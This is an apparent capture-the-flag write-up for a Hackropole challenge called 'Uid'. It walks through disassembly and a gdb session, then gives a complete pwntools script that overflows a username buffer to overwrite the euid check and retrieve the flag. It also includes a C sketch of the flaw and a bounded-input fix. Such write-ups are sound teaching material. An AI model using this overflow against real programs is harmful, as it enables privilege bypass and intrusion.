Uid | Hackropole

Uid

Resources

Analysis

Code reading

call   0x1050 <geteuid@plt>
mov    DWORD PTR [rbp-0x4],eax
...
cmp    DWORD PTR [rbp-0x4],0x0
jne    0x11d1 <main+92>
lea    rdi,[rip+0xe48]        # 0x2012
call   0x1030 <system@plt>
jmp    0x11dd <main+104>
lea    rdi,[rip+0xe47]        # 0x201f
call   0x1030 <system@plt>
x/s $rdi
0x55555555601f: "cat flop.txt"

x/s $rdi-0x9
0x555555556016: "flag.txt"

Just after the scanf that reads the user input, the program compares the local variable holding the euid (at rbp-0x4) with 0x0: if it is zero, we get the flag (flag.txt); otherwise, we get the flop (flop.txt).

Exploit

Our objective is to overwrite the euid variable by overflowing the user input buffer.

b *main+72
Breakpoint 1 at 0x11bd

r
username: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBCCCCCCCC

x/x $rbp-0x4
0x7fffffffd95c: 0x42424242

The "BBBB" bytes landed at rbp-0x4, so we can control the euid variable.
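The defect behind this overflow, as an added example that is not part of the original post or the challenge: the frame layout below is inferred from the disassembly and the gdb session above (an assumption, not the challenge source), and the bounded reader is the fix a reviewer would ask for in place of an unbounded scanf("%s").

```c
#include <stddef.h>
#include <string.h>

/* Frame shape inferred from the disassembly above (an assumption, not the
 * challenge source): a 44-byte username buffer sits directly below the 4-byte
 * euid slot at rbp-0x4, so the 45th byte written into name lands on euid. */
#define NAME_CAP 44

struct frame {
    char         name[NAME_CAP];
    unsigned int euid;   /* the value main+92 compares against 0 */
};

/* Vulnerable shape (inferred): scanf("%s", f->name) carries no width limit,
 * so any input of NAME_CAP bytes or more writes past name into euid. */

/* Hardened read, same contract as fgets(dst, cap, stdin) followed by
 * stripping the newline, which is the drop-in replacement for scanf("%s"):
 * copies at most cap-1 bytes of src up to the first newline, always
 * NUL-terminates, and returns 1 when the line had to be truncated. */
int read_username(char *dst, size_t cap, const char *src)
{
    if (cap == 0) return 0;
    size_t n = 0;
    while (src[n] != '\0' && src[n] != '\n' && n < cap - 1) {
        dst[n] = src[n];
        n++;
    }
    dst[n] = '\0';
    return src[n] != '\0' && src[n] != '\n';
}

/* Runs one login prompt against a constructed input line and reports whether
 * euid survived untouched, the property the overflow on this page destroys. */
int euid_survives(const char *line, unsigned int euid)
{
    struct frame f;
    f.euid = euid;
    read_username(f.name, sizeof f.name, line);
    return f.euid == euid;
}
```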

We can create the payload like this:

payload =   b""
payload +=  b"A" * 44
payload +=  b"\x00"

Complete exploit:

#!/usr/bin/env python3

from pwn import *
import argparse
import sys

context.arch = "amd64"

def get_args():
    # -h is used for --host, so the help flag is moved to -?
    parser = argparse.ArgumentParser(add_help=False)
    parser.add_argument("-?", "--help",     action="help", help="show this help message and exit")
    parser.add_argument("-l", "--local",    help="File path to the binary", type=str)
    parser.add_argument("-p", "--port",     help="Remote port", type=int)
    parser.add_argument("-h", "--host",     help="Remote host", type=str)

    args = parser.parse_args()

    return args

def main(args):
    if args.local:
        target = process(args.local)
    elif args.host and args.port:
        target = remote(args.host, args.port)
    else:
        sys.exit("usage: give either -l <binary> or -h <host> -p <port>")

    # 44 bytes fill the username buffer up to rbp-0x4, where euid lives;
    # the bytes written after that land on euid
    payload =   b""
    payload +=  b"A" * 44
    payload +=  b"\x00"

    user_input = target.recvuntil(b"username: ")
    print(f"[<] {user_input}")

    print(f"[>] {payload}")
    target.sendline(payload)
    print(target.recvline())

    exit(0)

if __name__ == "__main__":
    args = get_args()
    main(args)

Getting the flag

./exploit.py -h 127.0.0.1 -p 4000
[+] Opening connection to 127.0.0.1 on port 4000: Done
[<] b'username: '
[>] b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00'
b'FCSC{3ce9............................................6469}\n'
[*] Closed connection to 127.0.0.1 port 4000
This post is licensed under CC BY 4.0 by the author.